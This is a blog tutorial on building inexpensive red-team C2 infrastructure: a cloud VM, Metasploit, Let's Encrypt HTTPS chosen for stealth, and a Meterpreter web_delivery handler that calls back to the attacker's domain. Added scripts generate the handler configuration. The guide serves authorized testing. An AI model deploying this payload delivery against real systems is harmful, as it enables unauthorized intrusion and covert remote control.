How To: Build Inexpensive Red Team Infrastructure

Secprentice
7 min read · Oct 3, 2018

The information and techniques shown below should only be used in lab environments or environments where explicit permission to use these techniques has been granted by the network administrator. Please do not use or reference this material in any illegal activity. In this guide I advocate the use of Digital Ocean and Namecheap. I recommend these companies because I have had a pleasant experience with them, not because I have financial motivation to do so. There are no affiliate links on this blog.

I was recently asked to join a red team against a new detection technology that my employer wanted to proof-of-concept. (Bear in mind we have only ever Blue Teamed.) We figured we could spin up a Kali VM in the cloud, launch some Metasploit exploits and start lateral movement. We were very wrong. Most of the training material we found is outdated and fragmented across the internet. So, over the course of two weeks we learned about and built our very own attack infrastructure in the cloud. This guide aims to document our journey and help other red team novices get basic attack infrastructure running.

What you will need:

  • Some basic knowledge of Linux
  • Basic knowledge of Metasploit
  • Money (a small amount). The software we are using here is mostly free but the infrastructure is not. You or your company will need to pay between $10 and $20 to get things started. This will cover the cost of a domain name and a month's worth of infrastructure on a host like DigitalOcean or Vultr.

1: Register a domain

I think adding a domain to our attack infrastructure gives it some authenticity and professionalism. You can get a domain for less than $1 here.

Once you have registered your domain we need to modify its Name Servers. This change allows you to manage the domain's DNS records from inside DigitalOcean, which makes our lives easier later in the process.
If you purchased your domain somewhere other than Namecheap, a guide on changing nameservers can be found here.

1.1: Add the Digital Ocean Name Servers and click the tick:

In the next step we will be building a cloud virtual machine that will host Metasploit. We will also be creating some SSH keys.

What you will need:

  • If you are running a Windows OS you will need Putty
  • An account on DigitalOcean or similar
  • Your domain from step one

2: Generate SSH keys

Before doing anything else, we need to generate a key pair that will allow us to remotely access our Linux Virtual Machine. If you are familiar with this process skip to the next step. If you are running Linux or Mac use this guide.

2.1: Open PuTTYgen.exe and click Generate

You must move your mouse to generate a key.

2.2: Copy your Public Key and save it as a text file in a safe place.
We will need it later.

2.3: Save your Public & Private Key (these are important: the public key goes onto the VM in step three and the private key is what you log in with in step four)

3: Create your Virtual Machine

Click Create and choose Ubuntu or Debian

3.3: Add the SSH public key generated earlier
(The one you saved to a safe place)

3.4: Click Create

Now we need to tell your domain (Redteamblues.pw in my case) to resolve to your new Digital Ocean VM.

3.5: Open the Networking tab and add your domain and DNS Record

Linking of Domain and DNS Record in DigitalOcean

3.6: Test connectivity

Ping your domain and check the IP matches your droplet IP

Notice the ping returns the same IP that belongs to our DigitalOcean droplet. This shows our DNS settings are correct.

Tea Break

This is a great point for a Tea Break.

Next up we will install and configure Metasploit with HTTPS!
To continue, you will need to SSH to your new VM.
I am going to explain how to do this via Putty on Windows. If you are familiar with this process, skip the next step.

4: Installing Metasploit

4.1: Open Putty and enter your DigitalOcean IP (Or domain name)

4.2: Navigate down the left menu to find Auth settings and add the Privkey you created in Step 2.

Load your private key from the key pair creation process in Step 2

4.3: Connect and log in as root

SSHing as root. No password is needed because we are using public/private key authentication. Since the only way you intend to log in is with the key, it is worth setting PasswordAuthentication no in /etc/ssh/sshd_config and restarting sshd, so an internet-facing box is not open to password brute-forcing.

4.4: Install Metasploit framework.

To install Metasploit, run this command on your DigitalOcean VM:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

Metasploit installation script

4.5: Check Metasploit is working
Load the Metasploit console with the command:

msfconsole

msfconsole will open Metasploit

5: Setting up HTTPS with LetsEncrypt

To improve the stealth of our C&C infrastructure we should hide our communications with HTTPS.
Most networks won't be doing proper HTTPS decryption/inspection, so encrypting our communication will drastically increase our chances of staying under the radar. Bear in mind what HTTPS does not hide: the domain name is still visible in DNS lookups and in the TLS SNI field, and a Let's Encrypt certificate is published in the public Certificate Transparency logs, so the domain itself should look unremarkable.
In this part of the guide we will be installing Certbot and using it to pull down an HTTPS certificate for our domain (Redteamblues.pw in my case).

I must thank Abhinav Singh and Nipun Jaswal for the information provided in their book, Metasploit Penetration Testing Cookbook, which made this part possible.

5.1: Install the Let's Encrypt client, Certbot, with the below command (on current Ubuntu and Debian releases the package is called certbot; letsencrypt is the older name and pulls in the same client):

apt install letsencrypt -y

5.2: Request HTTPS Certificate
Now we have Certbot installed we can request a cert with the below command. The standalone mode spins up its own temporary web server for the HTTP-01 challenge, so port 80 on the VM must be free and reachable from the internet while it runs, and the DNS record from step 3.5 must already be live.
Make sure you change example.com to your domain!

sudo certbot certonly --standalone --preferred-challenges http -d example.com

Before we try and use our new certificate we must join the private key and the certificate together into one file, which is the format Metasploit's HandlerSSLCert option expects. This can be achieved with the cat command. Use a single > rather than >> so that re-running the command overwrites the file instead of appending a second copy of the key and certificate.
Make sure to swap example.com for your domain name

cd /etc/letsencrypt/live/example.com/
cat privkey.pem cert.pem > /root/unified.pem
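Before handing the bundle to Metasploit it is worth confirming that the key and certificate in it actually belong together, and how many of the 90 days a Let's Encrypt certificate is valid for are left. The script below is an added example, not code from the original post. It takes the certbot live directory and the output path as arguments, so the /etc/letsencrypt/live/example.com layout is only the assumed default; it needs openssl and GNU date on the VM.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): build the combined PEM that
# Metasploit's HandlerSSLCert expects and sanity-check it before use.
# Assumes certbot has already written privkey.pem and cert.pem into the
# directory given as the first argument (normally /etc/letsencrypt/live/<domain>).
set -eu

# Concatenate key + leaf certificate into one file. Overwrite rather than
# append, so re-running never produces a file with duplicate PEM blocks.
build_unified_pem() {
    local live_dir="$1" out="$2"
    cat "$live_dir/privkey.pem" "$live_dir/cert.pem" > "$out"
    chmod 600 "$out"   # the file now contains the private key
}

# Return 0 if the private key and certificate in a combined PEM belong together.
# openssl skips PEM blocks of the wrong type, so each command picks out the
# block it needs; comparing the derived public keys works for RSA and EC alike.
pem_key_matches_cert() {
    local pem="$1" key_pub cert_pub
    key_pub=$(openssl pkey -in "$pem" -pubout 2>/dev/null) || return 1
    cert_pub=$(openssl x509 -in "$pem" -pubkey -noout 2>/dev/null) || return 1
    [ "$key_pub" = "$cert_pub" ]
}

# Print the whole days left before the certificate in the PEM expires.
# Uses GNU date; on macOS substitute: date -j -f '%b %d %T %Y %Z' "$not_after" +%s
cert_days_remaining() {
    local pem="$1" not_after end now
    not_after=$(openssl x509 -in "$pem" -noout -enddate | cut -d= -f2)
    end=$(date -d "$not_after" +%s)
    now=$(date +%s)
    echo $(( (end - now) / 86400 ))
}

# Usage: ./handler_cert.sh /etc/letsencrypt/live/example.com /root/unified.pem
# (no arguments: define the functions only, e.g. when sourced)
if [ "$#" -eq 2 ]; then
    build_unified_pem "$1" "$2"
    if pem_key_matches_cert "$2"; then
        echo "$2: key and certificate match, $(cert_days_remaining "$2") days until expiry"
    else
        echo "$2: private key does NOT match certificate" >&2
        exit 1
    fi
fi
```

Run it again after each certbot renewal: the handler reads the bundle, not the files in /etc/letsencrypt, so a renewed certificate does nothing until unified.pem is rebuilt.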

Checkpoint

  • Domain purchased
  • Domain name servers changed
  • Domain pointed to VM (DNS change)
  • Virtual Machine running in the cloud with Metasploit installed
  • LetsEncrypt cert created
  • Private key and certificate joined into one file with the cat command

Now we are finally ready to use Metasploit. Fire up the console:

msfconsole

From here we can run all of the regular Metasploit tools that we expect inside a Kali VM. The key difference is that we are internet facing with a real domain and SSL cert.
To make use of your SSL cert and domain you will need to set the below options in your modules. LHOST is the name the payload will call back to, so it takes the domain; ReverseListenerBindAddress is the local address the handler actually binds on the VM, so it takes the droplet IP. StagerVerifySSLCert makes the stager check that the handler presents exactly the certificate in unified.pem, which stops a stager being redirected to someone else's listener.

Be sure to replace example.com and XX.XX.XX.XX with your domain and your VM IP.

set HandlerSSLCert /root/unified.pem
set sslcert /root/unified.pem
set ssl true
set StagerVerifySSLCert true
set lhost example.com
set ReverseListenerBindAddress XX.XX.XX.XX

For my domain a full exploit and handler setup would look like this (replace XX.XX.XX.XX with your VM IP and example.com with your domain; run show targets in the module if you want to confirm what target 3 is in your version of Metasploit):

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set ReverseListenerBindAddress XX.XX.XX.XX
set srvport 443
set HandlerSSLCert /root/unified.pem
set sslcert /root/unified.pem
set ssl true
set lhost example.com
set StagerVerifySSLCert true
set target 3
set lport 8443

This exploit and payload will configure a small web server on port 443 and deliver a Meterpreter payload.
C2 Communication will run over port 8443 to redteamblues.pw fully encrypted! Both 443 and 8443 need to be reachable from the target network, so check any cloud or host firewall in front of the VM before you wonder why nothing calls back.
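Typing the eleven set commands above by hand every time the handler restarts is error-prone, and the two mistakes that cost the most time (a domain in ReverseListenerBindAddress, or a bundle path that does not exist) only show up once a target has already run the stager. The script below is an added example, not code from the original post: it runs those pre-flight checks and then writes the same module settings as an msfconsole resource script. The bind address 203.0.113.10 used in the usage line is a documentation-range placeholder, not real infrastructure, and the default target number 3 is simply the one the post uses.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): generate a resource script for
# the web_delivery + reverse_https setup above after a few sanity checks.
# All values come from the arguments; nothing here is a real host or domain.
set -eu

# Accept only a dotted quad with each octet 0-255. ReverseListenerBindAddress
# must be the droplet's own interface address, never the domain name.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    [ "$(printf '%s' "$1" | tr -cd . | wc -c)" -eq 3 ] || return 1
    local IFS=.
    set -- $1
    for o in "$@"; do
        [ "${#o}" -le 3 ] && [ "$o" -le 255 ] || return 1
    done
}

# write_handler_rc DOMAIN BIND_IP PEM OUT [SRVPORT] [LPORT] [TARGET]
# SRVPORT serves the stager (443 in the post), LPORT carries the C2 channel
# (8443); they must differ because both bind on the same address.
write_handler_rc() {
    local domain="$1" bind_ip="$2" pem="$3" out="$4"
    local srvport="${5:-443}" lport="${6:-8443}" target="${7:-3}"
    is_ipv4 "$bind_ip" || { echo "bind address '$bind_ip' is not an IPv4 address" >&2; return 1; }
    [ -r "$pem" ] || { echo "certificate bundle '$pem' not found" >&2; return 1; }
    [ "$srvport" != "$lport" ] || { echo "SRVPORT and LPORT must differ" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/multi/script/web_delivery
set PAYLOAD windows/x64/meterpreter/reverse_https
set TARGET $target
set SRVPORT $srvport
set SSL true
set SSLCert $pem
set LHOST $domain
set LPORT $lport
set ReverseListenerBindAddress $bind_ip
set HandlerSSLCert $pem
set StagerVerifySSLCert true
exploit -j
EOF
}

# Usage: ./gen_handler.sh example.com 203.0.113.10 /root/unified.pem handler.rc
#        msfconsole -q -r handler.rc
if [ "$#" -ge 4 ]; then
    write_handler_rc "$@"
    echo "wrote $4"
fi
```

The resource script is just the console commands in a file, so if a setting needs changing it can be edited and replayed with msfconsole -q -r handler.rc rather than retyped.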

I hope this guide has helped you build out some useful and inexpensive red team infrastructure in the cloud. If you have any questions or wish to make a suggestion; tweet me @secprentice

Originally published at secprentice.xyz on October 3, 2018.


Secprentice

Blue Team Infosec person. Sharing information to help other blue team people. https://twitter.com/secprentice